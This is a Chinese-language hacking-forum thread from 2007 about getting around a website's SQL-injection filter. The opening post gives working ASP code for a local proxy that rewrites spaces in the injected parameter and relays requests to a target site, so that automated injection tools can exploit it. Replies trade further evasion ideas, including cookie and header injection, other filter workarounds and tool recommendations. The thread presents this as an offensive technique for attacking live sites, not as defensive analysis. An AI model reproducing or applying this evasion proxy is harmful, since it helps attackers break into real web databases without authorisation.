[讨论]本地转发绕过SQL过滤
议题作者:武夫信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
今天检测一个站的时候,发现有SQL注入,但是当关键字和%20(空格)在一块出现的时候会提出错误,注入工具检测不了.加上他又是错误提示关闭,所以手工注入超级麻烦.为了充分发挥懒人的精神,我在本地搭建了IIS,写了如下代码,成功绕过.
[language=asp]<%
id=request("id") '得到变量id
id=replace(id," ","+") '转换
url="http://www.xxxxx.com.cn/content.asp?id=" & id
Set hackwolf = CreateObject("Microsoft.XMLHTTP")
hackwolf.Open "GET",url,False
hackwolf.Send()
res=hackwolf.responseBody
x=Bytes2bStr(res)
response.write x
set hackwolf=nothing
Function Bytes2bStr(vin)
Dim BytesStream,StringReturn
Set BytesStream = Server.CreateObject("ADODB.Stream")
BytesStream.Type = 2
BytesStream.Open
BytesStream.WriteText vin
BytesStream.Position = 0
BytesStream.Charset = "GB2312"
BytesStream.Position = 2
StringReturn =BytesStream.ReadText
BytesStream.close
Set BytesStream = Nothing
Bytes2bStr = StringReturn
End Function
%>[/language] 想知道为什么本地搭建了IIS,写了上面的代码, 就可以成功绕过呢? 注入软件可以自动识别你的代码? 如何操作? 可否详细赐教?
很菜的问题, 不好意思。 nb3里不是有空格替换的嘛,多此一举。这种东西也能叫饶过过滤,标题一个个取的真NB。 挺不错的,这个可不仅仅能绕过空格哦,发挥一下想象力,HEHE 这个是刺猬早就发过了,不久是这个,还可以HTTP头 [quote]引用第2楼fatcat于2007-10-17 00:39发表的 :
nb3里不是有空格替换的嘛,多此一举。这种东西也能叫饶过过滤,标题一个个取的真NB。[/quote]
你懂什么叫以小见大嘛?
我拿这代码改改可以对付十种以上的不同的站 见过别人cookies 注入时用过类似的方法。 楼主可否展开些讲, 这样我等菜鸟接受起来容易些。
比如, 同时过滤了 空格和and 等等情况 该如何替换?
先谢了! [s:264] 可以去下载个大禅的 注入绕过工具试试
页:
[1]